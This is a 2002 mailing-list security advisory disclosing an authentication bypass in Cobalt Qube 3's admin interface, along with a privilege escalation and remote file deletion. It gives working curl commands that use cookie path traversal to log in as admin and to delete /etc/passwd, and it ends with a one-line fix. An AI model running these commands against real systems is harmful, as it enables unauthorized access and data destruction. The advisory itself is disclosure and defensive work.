Cobalt Qube 3 Administration page

From: pokley (saleh@scan-associates.net)
Date: Tue Jul 23 2002 - 18:40:01 PDT

Next message: bd@bc-bd.org: "Re: Denial of Service in ZyXEL prestige 642R w/ZyNOS v2.50(FA.1)"

Previous message: http-equivat_private: "[Full-Disclosure] REFRESH: EUDORA MAIL 5.1.1"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

SCAN Associates Sdn Bhd Security Advisory


Product: Cobalt Qube 3 (Cobalt Linux release 6.0 (Carmel)Kernel 2.2.16C7 on
an i586)

Date: 23rd July 2002

Summary: By pass login

Author: pokleyzz <pokleyzz@scan-associates.net>, sk <sk@scan-associates.net>,
shaharil <shaharil@scan-associates.net>


Description
===========
First of all, we would like to thank you Sun Microsystem (Malaysia) for
sponsoring a Cobalt Qube 3 server during the recent HackInTheBox Capture the
Flag Security Conference on 16-17 July 2002. Being the winner, we are proud
to receive this cool box. After playing around for awhile, we found several
problems in Cobalt Qube 3 System Management. The most serious bug may allow
remote access as Admin. We have alerted security-alertat_private and Sun
Microsystem (Malaysia) on 19th July but unfortunately we did not receive any
feedback.

Details
=======

Problem 1: Local Privilege Escalation to Admin

Any user with ability to create file in any location of a Cobalt server will
be able to promote to Admin access of the System Management. A user may
create a file in /tmp/test and crafted a cookie to login as Admin without
password:

Create dummy session file in Cobalt server:

$ printf "admin" > /tmp/test

Login without password from anywhere:

$ curl -b sessionId=/../../../../../../tmp/test\;loginName=admin
http://192.168.0.1:444/splashAdmin.php


Problem 2: Remote User access

We also found out that if the User account is newly created, we can bypass
the authentication without a need to create dummy session file in the
server:

$curl -b sessionId=../codb/objects/4/.name\;loginName=admin
http://192.168.0.1:444/splashAdmin.php


Problem 3: Remotely delete file

It is possible to delete file from the server by specifying the path to the
file and the first 31 characters of the file. The following example will
delete the /etc/passwd file from the server:

$curl -b
sessionId=../../../../../../../../etc/passwd\;loginName=root:x:0:0:root:/root:/bin/bash 
http://192.168.0.1:444/splashAdmin.php


Quick Solution
==============

/usr/sausalito/ui/libPhp/ServerScriptHelper.php

line 64: 
$sessionId = ereg_replace("\.\.","",$sessionId);



* - curl can be download from http://curl.haxx.se/download.html


www.scan-associates.net

Next message: bd@bc-bd.org: "Re: Denial of Service in ZyXEL prestige 642R w/ZyNOS v2.50(FA.1)"
Previous message: http-equivat_private: "[Full-Disclosure] REFRESH: EUDORA MAIL 5.1.1"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Jul 24 2002 - 11:17:41 PDT